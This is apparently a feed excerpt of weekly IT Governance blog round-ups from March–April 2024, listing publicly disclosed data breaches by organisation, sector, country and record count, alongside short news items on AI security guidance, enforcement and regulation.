Risas Dental and Braces | Source 1; source 2 | New | Healthcare | USA | Yes | 618,189
HUB International | Source | New | Insurance | USA | Yes | 514,477
Lee University | Source 1; source 2 | New | Education | USA | Yes | 387.49 GB
Village Family Dental | Source 1; source 2 | New | Healthcare | USA | Yes | 240,214
Cherry Health | Source 1; source 2 | Update | Healthcare | USA | Yes | 184,372
Arby’s | Source 1; source 2 | New | Hospitality | USA | Yes | 175 GB
Albatros | Source | New | Manufacturing | Russia | Yes | >100 GB
T2 Tea | Source 1; source 2 | New | Retail | Australia | Yes | 85,894
Argentinian database of driving licences | Source | New | Public | Argentina | Yes | 70,000
sa.global | Source | New | IT services | USA | Yes | 41 GB
Blackstone Valley Community Health Care | Source 1; source 2 | Update | Healthcare | USA | Yes | 34,416
Green Diamond Resource Company | Source | New | Environmental | USA | Yes | 27,896
Kisco Senior Living | Source | New | Healthcare | USA | Yes | 26,663
Roman Catholic Diocese of Phoenix | Source | New | Religious | USA | Yes | 23,853
Bi-State Development | Source | New | Public | USA | Yes | 21,953
University of Tennessee Health Science Center | Source 1; source 2 | New | Education | USA | Yes | 19,353
Township of Montclair | Source | New | Public | USA | Yes | 17,835
Carl Buddig and Company | Source | New | Hospitality | USA | Yes | 11,830
Asteco Property Management | Source | New | Real estate | UAE | Yes | 11.4 GB
Ministry of Public Health and Social Assistance | Source | New | Public | Dominican Republic | Yes | >8,000
Island Ambulatory Surgery Center | Source 1; source 2 | New | Healthcare | USA | Yes | 7,900
Federal Penitentiary Service | Source | New | Public | Argentina | Yes | 7,115
Taft Stettinius & Hollister LLP | Source 1; source 2 | Update | Legal | USA | Yes | 5,980
Citizens Property Insurance Corporation | Source | New | Insurance | USA | Yes | 4,948
Northern Colorado Long Term Acute Hospital | Source 1; source 2 | New | Healthcare | USA | Yes | 4,335
Numotion | Source | New | Manufacturing | USA | Yes | 4,190
Olive View – UCLA Medical Center | Source 1; source 2 | New | Education | USA | Yes | 3,716
Butler, Lavanceau & Sober, LLC | Source | New | Finance | USA | Yes | 3,370
Catholic Medical Center | Source | New | Healthcare | USA | Yes | 2,792
Concorde Entertainment Group | Source | New | Hospitality | Canada | Yes | 2 GB
Atlanta Technical College | Source | New | Education | USA | Yes | 1,523
WIS International | Source | New | Retail | USA | Yes | 1,295
HBL CPAs, P.C. | Source | New | Finance | USA | Yes | 1,206
DES | Source | New | Engineering | USA | Yes | 1,144
Baylor College of Medicine | Source 1; source 2; source 3 | Update | Education | USA | Yes | 801
Medical Home Network | Source | New | Healthcare | USA | Yes | 681
Moveable Feast | Source | New | Non-profit | USA | Yes | 568
Jackson Medical Center | Source 1; source 2 | New | Healthcare | USA | Yes | 509
Washington County Department of Human Services | Source 1; source 2 | New | Public | USA | Yes | 501
Basingstoke MP Maria Miller | Source | New | Public | UK | Yes | 500
SMRT Architects & Engineers | Source 1; source 2 | Update | Engineering | USA | Yes | 348
Pandemonium Rocks | Source | New | Leisure | Australia | Yes | “hundreds”
EBIR Bathroom Lighting | Source | New | Manufacturing | Spain | Yes | 200 MB
Former Manx Care employee | Source | New | Healthcare | UK | Yes | 160
Big Ass Fans | Source | New | Manufacturing | USA | Yes | 146
Cocoon, Inc. | Source | New | Manufacturing | USA | Yes | 50
Avalon Trust | Source | New | Finance | USA | Yes | 27
Grodno Azot | Source | New | Manufacturing | Belarus | Yes | Unknown
Canadia Bank | Source | New | Finance | Cambodia | Yes | Unknown
ND Paper | Source | New | Media | China | Yes | Unknown
Kameymall | Source | New | Retail | China | Yes | Unknown
UNDP (United Nations Development Programme) | Source | New | Non-profit | Denmark | Yes | Unknown
Consejo de la Judicatura | Source | New | Legal | Ecuador | Yes | Unknown
Ministerio de Educación, Ciencia y Tecnología de El Salvador | Source | New | Public | El Salvador | Yes | Unknown
Lyon Terminal | Source 1; source 2 | New | Transport | France | Yes | Unknown
Volkswagen | Source | New | Manufacturing | Germany | Yes | Unknown
Union Hospital | Source | New | Healthcare | Hong Kong | Yes | Unknown
QUEST Alliance | Source | New | Non-profit | India | Yes | Unknown
Extern | Source | New | Charity | Ireland | Yes | Unknown
Coppel | Source 1; source 2 | New | Retail | Mexico | Yes | Unknown
Iddink Group | Source | New | IT services | Netherlands | Yes | Unknown
Nieuwsbank | Source | New | Media | Netherlands | Yes | Unknown
Hamdard Pakistan | Source | New | Manufacturing | Pakistan | Yes | Unknown
Pak Suzuki Motor Company Limited | Source | New | Manufacturing | Pakistan | Yes | Unknown
Ministry of Finance, Republic of Serbia | Source | New | Public | Serbia | Yes | Unknown
5 primary and 122 secondary schools in Singapore, through Mobile Guardian | Source | New | Education and software | Singapore | Yes | Unknown
International Trade Administration Commission of SA | Source | New | Public | South Africa | Yes | Unknown
AsiaLove | Source | New | Software | South Korea | Yes | Unknown
Lopesan | Source 1; source 2 | New | Hospitality | Spain | Yes | Unknown
ASESGC Guardia Civil | Source | New | Non-profit | Spain | Yes | Unknown
Bagcilar Education and Research Hospital | Source | New | Healthcare | Turkey | Yes | Unknown
Bureau van Dijk | Source | New | Professional services | UK | Yes | Unknown
Zest Protocol | Source | New | Crypto | UK | Yes | Unknown
Companies House | Source | New | Public | UK | Yes | Unknown
Tasteful Selections LLC | Source | New | Agricultural | USA | Yes | Unknown
Cisco Duo and its telephony supplier | Source | New | Cyber security and telecoms | USA | Yes | Unknown
Brandeis University | Source | New | Education | USA | Yes | Unknown
ASMFC (Atlantic States Marine Fisheries Commission) | Source | New | Environmental | USA | Yes | Unknown
Bauknight Pietras & Stormer, P.A. | Source | New | Finance | USA | Yes | Unknown
BlueChip Financial | Source | New | Finance | USA | Yes | Unknown
Continuing Healthcare Solutions | Source | New | Healthcare | USA | Yes | Unknown
SysInformation | Source | New | Healthcare | USA | Yes | Unknown
Space-Eyes | Source | New | IT services | USA | Yes | Unknown
VIP (Visionary Integration Professionals) | Source | New | IT services | USA | Yes | Unknown
Allcare Pharmacy / W.P. Malone, Inc. | Source | New | Manufacturing | USA | Yes | Unknown
Cembell Industries Inc | Source | New | Manufacturing | USA | Yes | Unknown
HB Molding, Inc. | Source | New | Manufacturing | USA | Yes | Unknown
The Post and Courier | Source | New | Media | USA | Yes | Unknown
European Wax Center | Source | New | Professional services | USA | Yes | Unknown
Solano County Library | Source | New | Public | USA | Yes | Unknown
Blooms Today | Source | New | Retail | USA | Yes | Unknown
Payroll Select Services | Source | New | Software | USA | Yes | Unknown
Unspecified US consumer database | Source | New | Unknown | USA | Yes | Unknown
Frontier Internet | Source | New | Telecoms | USA | Yes | Unknown
Hedgey | Source | New | Blockchain | Unknown | Yes | Unknown
Honda Vietnam Company Limited | Source | New | Manufacturing | Vietnam | Yes | Unknown
Grand Base | Source | New | Blockchain | Unknown | Yes | Unknown
Barnetts Couriers | Source | New | Transport | Australia | Unknown | Unknown
Hôpital de Cannes – Simone Veil | Source | New | Healthcare | France | Unknown | Unknown
SYNLAB Italia | Source | New | Research | Italy | Unknown | Unknown
OGERO | Source | New | Telecoms | Lebanon | Unknown | Unknown
1+1 media | Source | New | Media | Ukraine | Unknown | Unknown
MITRE | Source | New | Cyber security | USA | Unknown | Unknown
Octapharma Plasma, Inc. | Source | New | Manufacturing | USA | Unknown | Unknown
Systems used by New York’s legislature | Source | New | Public | USA | Unknown | Unknown
OLA (Observatorio de Libertad Académica) | Source | New | Non-profit | Cuba | No | 0
Likud Party | Source | New | Public | Israel | No | 0
LRT | Source | New | Media | Lithuania | No | 0
Carpetright | Source | New | Retail | UK | No | 0
Gmail And YouTube users | Source | New | IT services | USA | No | 0

Note 1: ‘New’/‘Update’ against each organisation refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all. To learn more about our research methodology, click here.


AI

NSA published guidance on strengthening the security of AI systems

The US National Security Agency has published a cyber security information sheet entitled Deploying AI Systems Securely: Best Practices for Deploying Secure and Resilient AI Systems. The guidance was designed for national security purposes, but can be applied by anyone bringing AI capabilities into a managed environment.

Protect AI releases April 2024 vulnerability report

Protect AI has published its latest monthly report into security vulnerabilities affecting AI systems. This month contains 48 vulnerabilities, up 220% from the 15 it identified in November 2023.

Enforcement

Proposed FTC order will fine Cerebral, Inc. $7 million and restrict its use of sensitive data

Cerebral, Inc. has agreed to an FTC order that will prohibit it from using or disclosing sensitive consumer data for advertising purposes. Under the proposed order, the company will be required to pay more than $7 million for violating its customers’ privacy rights.

International law enforcement operation disrupts LabHost phishing-as-a-service platform

A law enforcement operation involving 19 countries has disrupted LabHost, one of the world’s largest phishing-as-a-service platforms. Thirty-seven suspects have been arrested and the LabHost platform has been shut down.


Other news

ENISA will not create vulnerability database

Hans de Vries, the new chief cybersecurity and operational officer of ENISA, the EU Agency for Cybersecurity, has confirmed that his agency will not create a database of security vulnerabilities, as proposed by the EU Cyber Resilience Act.

NCSC CAF (Cyber Assessment Framework) 3.2 published

The National Cyber Security Centre has published version 3.2 of its Cyber Assessment Framework. Significant changes have been made to sections covering remote access, privileged operations, user access levels and the use of multifactor authentication.

CREST launches new cyber threat intelligence guide

CREST has published a new guide: What is Cyber Threat Intelligence and How is it Used? It provides accessible advice on the theory and practice of CTI products and services, outlining key concepts and principles underpinning CTI, along with the ways organisations can use CTI to predict, prevent, detect and respond to potential cyber security threats and reduce cyber risk.

NATO to launch new cyber centre

Acknowledging that “cyberspace is contested at all times”, NATO will create a new cyber centre at its military headquarters in Mons, Belgium. James Appathurai, NATO’s deputy assistant secretary general for innovation, hybrid and cyber, said the new centre would be modelled on the UK’s NCSC.

HHS patches security after cyber attack

Following a cyber attack on the US Department of Health and Human Services last year, in which criminals stole $7.5 million, the Department is removing HHS Login from its grantee payment system.

EDPB sets out priorities for 2024–2027

The EDPB (European Data Protection Board) has adopted its strategy for 2024–2027, which is based around four pillars:

  1. Enhancing harmonisation and promoting compliance.
  2. Reinforcing a common enforcement culture and effective cooperation.
  3. Safeguarding data protection in the developing digital and cross-regulatory landscape.
  4. Contributing to the global dialogue on data protection.

The Board’s chair, Anu Talus, said: “The new strategy takes the existing vision in a new direction in order to respond to the data protection needs of today, and the ever evolving digital landscape. The strategy is the result of a collaborative effort, involving all EU data protection authorities (DPAs) and sets out common priorities for the years to come.”

EDPB publishes opinion on Meta’s ‘pay or OK’ model

The EDPB has published its opinion on Meta’s proposed ‘pay or consent’ model, which aims to charge users a monthly fee to use its platforms without targeted advertising. Louise Brooks, from IT Governance’s sister company DQM GRC, observes:

“The opinion finds that Meta’s proposed ‘pay or consent’ model isn’t compliant with the EU GDPR, but it doesn’t go so far as to rule it out as an option completely. It’s important at this stage to understand that EDPB opinions are not legally binding.

“However, the opinion was requested by supervisory authorities for the purpose of active cases under consideration for enforcement action, so the outcome of those cases will add context and detail to the interpretation of, and potential future reliance upon, the opinion.

“From a UK perspective, we know the ICO is actively monitoring the European debate on this issue as it confirmed the same at the DMA’s recent annual conference, so it remains to be seen how the EDPB’s opinion might be used or interpreted here.

“The debate certainly isn’t over, and we probably need to wait for case law to proceed before we can really start seeing the wood for the trees and understand the ramifications.

“Nevertheless, any sensible large online platforms would do well to model alternatives and consider the impact any precedents set by enforcement actions that don’t support their business models might have.”

ICO publishes guidance to improve transparency in health and social care

The ICO (Information Commissioner’s Office) has published new guidance to provide regulatory certainty on how health and social care organisations should handle sensitive information while keeping people properly informed.


Recently published reports


Key dates

29 April 2024 – UK Product Security and Telecommunications Infrastructure Act 2022 comes into effect

The UK’s consumer connectable product security regime comes into effect on 29 April 2024. Businesses in the supply chains of these products need to be compliant with the legislation from that date.

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post The Week in Cyber Security and Data Privacy: 15 – 21 April 2024 appeared first on IT Governance UK Blog.

The Week in Cyber Security and Data Privacy: 8 – 14 April 2024 (https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-8-14-april-2024; Mon, 15 Apr 2024 16:48:13 +0000)
7,531,492 known records breached in 124 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Update on last week’s story about the alleged US EPA (Environmental Protection Agency) breach: it appears the data was already publicly available. We’ve therefore removed this entry from our incident log.


Publicly disclosed data breaches and cyber attacks: in the spotlight

AT&T confirms more than 50 million customers affected by March data breach

On 17 March, a threat actor known as Major Nelson listed more than 70 million data records on a dark web forum, claiming it to be data originally exfiltrated from AT&T by a threat actor known as ShinyHunters in 2021. AT&T said the data did not come from its systems.

Now, the company has confirmed that more than 50 million people’s data was in fact included in the 17 March data leak. Compromised data included full names, email addresses, postal addresses, phone numbers, Social Security numbers, dates of birth, AT&T account numbers and AT&T passcodes. According to AT&T’s investigation, the data appears to be from June 2019 or earlier.

Data breached: 51,226,382 people’s data.

Giant Tiger confirms data breach via third party

The Canadian retail chain Giant Tiger has reported that one of its vendors has suffered a cyber attack, affecting nearly 3 million Giant Tiger customer data records. Compromised data included customers’ names, postal addresses, email addresses, phone numbers and purchase data, all of which was leaked online.

The data breach notification website Have I Been Pwned added the data to its database on 12 April, confirming that 46% of the records were already in its database.

Data breached: 2,842,669 records.

Cyber attack causes Traverse City Area Public Schools to cancel classes

TCAPS (Traverse City Area Public Schools) in Michigan cancelled classes on 1 and 2 April because of what it described as “network disruption that impacted the functionality and access of certain systems”.

On 14 April, a threat actor known as Medusa claimed to have stolen 1.2 TB of data from TCAPS, demanding a ransom of $500,000.

Data breached: 1.2 TB.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 7,531,492 records known to be compromised, and 124 organisations suffering a newly disclosed incident. 105 of them are known to have had data exfiltrated, exposed or otherwise breached. Only 3 definitely haven’t had data breached.

We also found 24 organisations providing a significant update on a previously disclosed incident.

Organisation(s) | Sector | Location | Data breached? | Known data breached
AT&T Inc. (Update; source 1; source 2) | Telecoms | USA | Yes | 51,226,382
boAt Lifestyle (Update; source 1; source 2) | Manufacturing | India | Yes | 7,528,986
Giant Tiger (Update; source 1; source 2; source 3) | Retail | Canada | Yes | 2,842,669
Traverse City Area Public Schools (Update; source 1; source 2) | Education | USA | Yes | 1.2 TB
Unknown (attributed to Accor) (New; source 1; source 2) | Hospitality | France | Yes | 642,000
Inszone Insurance Services (New; source) | Insurance | USA | Yes | 615,672
Roku (New; source) | Software | USA | Yes | 576,000
Group Health Cooperative of South Central Wisconsin (New; source) | Healthcare | USA | Yes | 533,809
Houser LLP (Update; source 1; source 2) | Legal | USA | Yes | 370,001
iCabbi (New; source 1; source 2) | Software | UK | Yes | 287,000
DISB (District of Columbia Department of Insurance, Securities and Banking) (New; source) | Public | USA | Yes | “few hundred” GBs
CURVA (New; source 1; source 2) | Retail | Egypt | Yes | 105,000
Pregnant women in El Salvador (New; source) | Healthcare | El Salvador | Yes | 96,191
Paducah Dermatology (New; source) | Healthcare | USA | Yes | 80,161
Nexperia (New; source) | Manufacturing | Netherlands | Yes | 74 GB
Gaia Software (New; source 1; source 2) | Software | USA | Yes | 56,676
forum.kasperskyclub.ru (Update; source 1; source 2) | IT services | Russia | Yes | 55,971
Bradford-Scott Data, Massachusetts Family Credit Union, Methuen Federal Credit Union, Priority Plus Federal Credit Union, StagePoint Federal Credit Union, Wellness Federal Credit Union, Community Credit Union of New Milford and The Andovers Federal Credit Union (Update; source 1; source 2) | Software and finance | USA | Yes | 43,435
SMC and Carrier Global (New; source) | Software | Netherlands | Yes | >26,000
St. Lucie County Tax Collector’s Office (Update; source 1; source 2) | Public | USA | Yes | 25,202
Canopy Children’s Solutions (New; source) | Non-profit | USA | Yes | 19,190
Cattaraugus-Allegany BOCES (New; source 1; source 2) | Education | USA | Yes | 15,203
SinglePoint Outsourcing, Inc. (Update; source 1; source 2) | Professional services | USA | Yes | 11,096
Trustpoint Rehabilitation Hospital of Lubbock (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 9,014
Mountain Valley Regional Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 5,963
Greenwood Regional Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 5,823
Northern Idaho Advanced Care Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 5,606
Rehabilitation Hospital of Southern New Mexico (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 5,466
New Braunfels Regional Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 5,384
Highmark Inc. (New; source 1; source 2) | Insurance | USA | Yes | 5,356
Spartanburg Rehabilitation Institute (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 4,506
MolenTax (New; source) | Finance | USA | Yes | 4,323
PRATT MRI LLC (New; source 1; source 2) | Healthcare | USA | Yes | 4,265
South Texas Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 4,130
Epilepsy Foundation of Metro New York (New; source) | Healthcare | USA | Yes | 3,852
Rehabilitation Hospital of the Northwest (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 3,821
Rehabilitation Hospital of Northwest Ohio (New; source 1; source 2) | Healthcare | USA | Yes | 3,671
Elkhorn Valley Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 3,636
Corpus Christi Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 3,581
Northern Utah Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 3,477
Mesquite Rehabilitation Institute (New; source 1; source 2) | Healthcare | USA | Yes | 3,317
Rehabilitation Hospital of Northern Arizona (New; source 1; source 2) | Healthcare | USA | Yes | 3,287
Summa Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 2,986
Lafayette Regional Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 2,861
Weslaco Regional Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 2,781
Lakewood Medical Center (New; source 1; source 2) | Healthcare | USA | Yes | 2,500
Builders Equipment & Tool Company (New; source 1; source 2) | Construction | USA | Yes | 2,463
Advanced Care Hospital of Montana (New; source 1; source 2) | Healthcare | USA | Yes | 2,331
Delphinus Engineering, Inc. (Update; source 1; source 2) | Engineering | USA | Yes | 2,232
The Goddard School (New; source) | Education | USA | Yes | 2,041
Midlands Regional Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 2,018
EBlock (New; source) | Software | USA | Yes | 1,997
UT Southwestern Medical Center (New; source 1; source 2) | Healthcare | USA | Yes | 1,956
Butler University and Athletic Trainer System (New; source) | Education and software | USA | Yes | 1,871
Laredo Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 1,785
Oceaneering (New; source) | Engineering | USA | Yes | 1,776
Rehabilitation Hospital of Northern Indiana (New; source 1; source 2) | Healthcare | USA | Yes | 1,643
Utah Valley Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 1,642
Baytown Medical Center, Inc. (New; source 1; source 2) | Healthcare | USA | Yes | 1,500
Continuum Health Alliance, LLC (New; source 1; source 2) | Healthcare | USA | Yes | 1,328
Autoritatea Electorală Permanentă (New; source) | Public | Romania | Yes | 1,300
Mesquite Specialty Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 1,244
Laredo Specialty Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 1,242
Bloomington Regional Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 1,191
Advanced Care Hospital of Southern New Mexico (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 1,162
Florida Pediatric Associates (New; source 1; source 2) | Healthcare | USA | Yes | 1,104
Frank Olean Center (New; source) | Non-profit | USA | Yes | 1,050
Rehabilitation Hospital of Southern California (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 925
Randolph Health (New; source) | Healthcare | USA | Yes | 899
Northern Colorado Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 885
Bakersfield Rehabilitation Hospital (New; source 1; source 2) | Healthcare | USA | Yes | 852
Denver Regional Rehabilitation Hospital (Update; source 1; source 2; source 3) | Healthcare | USA | Yes | 848
Zuckerberg San Francisco General Hospital and Trauma Center (New; source 1; source 2) | Healthcare | USA | Yes | 755
Rutgers Robert Wood Johnson Medical School (New; source 1; source 2) | Education | USA | Yes | 543
Strive Holdco, LLC (New; source 1; source 2) | Healthcare | USA | Yes | 501
Sleep Management Institute (New; source 1; source 2) | Healthcare | USA | Yes | 500
TransAxle LLC (New; source) | Transport | USA | Yes | 401
Brown, Paindiris & Scott, LLP (New; source) | Legal | USA | Yes | 235
Bristol Bay Construction Holdings LLC (New; source) | Construction | USA | Yes | 27
CVS (New; source) | Non-profit | USA | Yes | 10
Wells Fargo (New; source 1; source 2) | Finance | USA | Yes | 2
Telecom Argentina (New; source) | Telecoms | Argentina | Yes | Unknown
Suncorp Bank (New; source) | Finance | Australia | Yes | Unknown
MotorCycle Holdings Limited (New; source) | Manufacturing | Australia | Yes | Unknown
Ecotech Print Solutions (New; source) | Professional services | Australia | Yes | Unknown
Herron Todd White (New; source) | Real estate | Australia | Yes | Unknown
BHF Couriers Express (New; source) | Transport | Australia | Yes | Unknown
Yoga4Yogi (New; source) | Professional services | Czech Republic | Yes | Unknown
Académie de Lyon and Ministère de l’Éducation nationale et de la Jeunesse (New; source) | Education and public | France | Yes | Unknown
Le Slip Français (New; source) | Retail | France | Yes | Unknown
Karnataka Skill Development Corporation (New; source) | Public | India | Yes | Unknown
LeadSquared and WeRize (New; source) | Software | India | Yes | Unknown
Alsaree3 Group Ltd. (New; source) | Hospitality | Iraq | Yes | Unknown
Israeli Ministry of Defense (New; source) | Public | Israel | Yes | Unknown
Multiplayer.it (New; source) | IT services | Italy | Yes | Unknown
Maccarinelli Autonegozi (New; source) | Retail | Italy | Yes | Unknown
INVEX (New; source) | Finance | Mexico | Yes | Unknown
Orderchamp (New; source) | IT services | Netherlands | Yes | Unknown
Universidad Inca Garcilaso de la Vega (New; source) | Education | Peru | Yes | Unknown
Tkachev Agricultural Complex (New; source) | Agricultural | Russia | Yes | Unknown
OwenCloud.ru (New; source) | Software | Russia | Yes | Unknown
Moskollektor (New; source) | Utilities | Russia | Yes | Unknown
University of Colombo (New; source) | Education | Sri Lanka | Yes | Unknown
NRS Healthcare (New; source) | Healthcare | UK | Yes | Unknown
THSP (New; source) | Public | UK | Yes | Unknown
CVS Group Plc (New; source) | Veterinary | UK | Yes | Unknown
East Central University (New; source) | Education | USA | Yes | Unknown
The University of Alabama (New; source) | Education | USA | Yes | Unknown
Community Alliance (New; source) | Healthcare | USA | Yes | Unknown
Hapy Bear Surgery Center (New; source 1; source 2) | Healthcare | USA | Yes | Unknown
Kenneth Young Center (New; source) | Healthcare | USA | Yes | Unknown
WebTPA (New; source) | Insurance | USA | Yes | Unknown
Henningson & Snoxell, Ltd. (New; source) | Legal | USA | Yes | Unknown
Thunderbird Country Club (New; source) | Leisure | USA | Yes | Unknown
Winterfest Boat Parade (New; source) | Leisure | USA | Yes | Unknown
OraSure Technologies (New; source) | Manufacturing | USA | Yes | Unknown
Rawlings Sporting Goods (New; source) | Manufacturing | USA | Yes | Unknown
Targus (New; source) | Manufacturing | USA | Yes | Unknown
Tandym Group (New; source 1; source 2) | Professional services | USA | Yes | Unknown
Hernando County Government (Update; source 1; source 2) | Public | USA | Yes | Unknown
The Bernstein Companies (New; source 1; source 2) | Real estate | USA | Yes | Unknown
PME Babbitt Bearings (New; source) | Retail | USA | Yes | Unknown
Microsoft (New; source) | Software | USA | Yes | Unknown
Sisense (New; source) | Software | USA | Yes | Unknown
Alan Ritchey, Inc. (New; source 1; source 2) | Transport | USA | Yes | Unknown
LG Electronics (New; source) | Manufacturing | South Korea | Unknown | Unknown
Paris Saint-Germain (New; source) | Leisure | France | Unknown | Unknown
Saint-Nazaire et agglomeration (New; source) | Public | France | Unknown | Unknown
GBI-Genios Deutsche Wirtschaftsdatenbank GmbH (New; source) | Media | Germany | Unknown | Unknown
Tel Aviv power outage (New; source) | Public | Israel | Unknown | Unknown
German Jordanian University (New; source) | Education | Jordan | Unknown | Unknown
King Abdullah II (New; source) | Public | Jordan | Unknown | Unknown
Queen Alia International Airport (New; source) | Transport | Jordan | Unknown | Unknown
Emeequis (New; source) | Media | Mexico | Unknown | Unknown
Eblal Healthcare (New; source) | Healthcare | Saudi Arabia | Unknown | Unknown
Casa Árabe (New; source) | Public | Spain | Unknown | Unknown
Robertson Cheatham Co-Op (New; source) | Agricultural | USA | Unknown | Unknown
New Mexico Highlands University and other New Mexico institutions (New; source 1; source 2) | Education | USA | Unknown | Unknown
Swinomish Casino & Lodge (New; source) | Leisure | USA | Unknown | Unknown
The Heritage Foundation (New; source) | Non-profit | USA | Unknown | Unknown
Dirección General de Contrataciones Públicas (New; source) | Public | Dominican Republic | No | 0
Belvedere Vodka UK (New; source) | Manufacturing | UK | No | 0
TUC (Trades Union Congress) (New; source) | Non-profit | UK | No | 0

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all. To learn more about our research methodology, click here.


AI

AI-written PowerShell script used in malicious email campaigns

Bleeping Computer reports that a threat actor is using a PowerShell script “likely” created with ChatGPT or a similar AI model to spread the Rhadamanthys information stealer via email. The security company Proofpoint attributed the attack to a threat actor tracked as TA547, also known as Scully Spider.

ICO seeks views on generative AI models’ accuracy

The ICO (Information Commissioner’s Office) has launched a consultation on how data protection law applies to generative AI, particularly in relation to its accuracy. The Information Commissioner, John Edwards, commented: “In a world where misinformation is growing, we cannot allow misuse of generative AI to erode trust in the truth. Organisations developing and deploying generative AI must comply with data protection law – including our expectations on accuracy of personal information.” The consultation is open until 5 pm on 10 May 2024.


Enforcement

European Parliament votes to enhance EU GDPR enforcement

MEPs have voted in favour of amendments to the EU GDPR (General Data Protection Regulation) that strengthen the Regulation’s enforcement. The amendments change the role of the supervisory authorities and remove some of their obligations to share the findings of their investigations.

Police investigating LockBit ransomware gang seek 200 suspected criminals

Police have matched some 200 LockBit affiliates’ pseudonyms to their real identities. A police spokesperson, who asked to remain anonymous, told Bloomberg that they “now have a clear idea of LockBit’s hierarchy and its most influential members, who they plan to pursue”.


Other news

Hunters International demands $10 million ransom from Hoya Corporation

Last week, we listed a security incident affecting several of Hoya Corporation’s divisions. It now transpires that the cyber attack was carried out by the Hunters International ransomware group, which has demanded a $10 million ransom from the Japanese optical instrument manufacturer. Hunters claims to have stolen 2 TB of data from the company, which it is threatening to release if its demands are not met.

NIST releases online courses for SP 800-53, SP 800-53A and SP 800-53B

NIST (National Institute of Standards and Technology) has released self-guided online courses on three of its standards: SP (Special Publication) 800-53, SP 800-53A and SP 800-53B.

All three courses are introductory, offering a “high-level overview of foundational security and privacy risk management concepts” based on these standards.

91,000 LG smart TVs vulnerable to attack

Bitdefender has discovered four security vulnerabilities affecting multiple versions of LG Electronics WebOS – the operating system used in its smart TVs. According to Bleeping Computer, the vulnerabilities “enable varying degrees of unauthorized access and control over affected models, including authorization bypasses, privilege escalation, and command injection”.

USDoD attempting to sell 2.9 billion data records from UK, US and Canada

A threat actor known as USDoD has listed a 4 TB database apparently containing 2.9 billion rows of data on a dark web forum. Given the scale of the database, we await verification before adding it to our listings.


Recently published reports


Key date

30 April 2024 – ISO/IEC 27001:2013 certification unavailable

Certification bodies must stop offering (re)certification to ISO 27001:2013 by 30 April. The new iteration of the Standard, ISO 27001:2022, isn’t significantly different from ISO 27001:2013, but there are some notable changes. Learn more about complying with ISO 27001:2022.


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The Week in Cyber Security and Data Privacy: 18 – 24 March 2024 https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-18-24-march-2024 Mon, 25 Mar 2024 19:14:12 +0000

134,503,937 known records breached in 1,091 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

Misconfigured Google Firebase instances expose almost 125 million user records

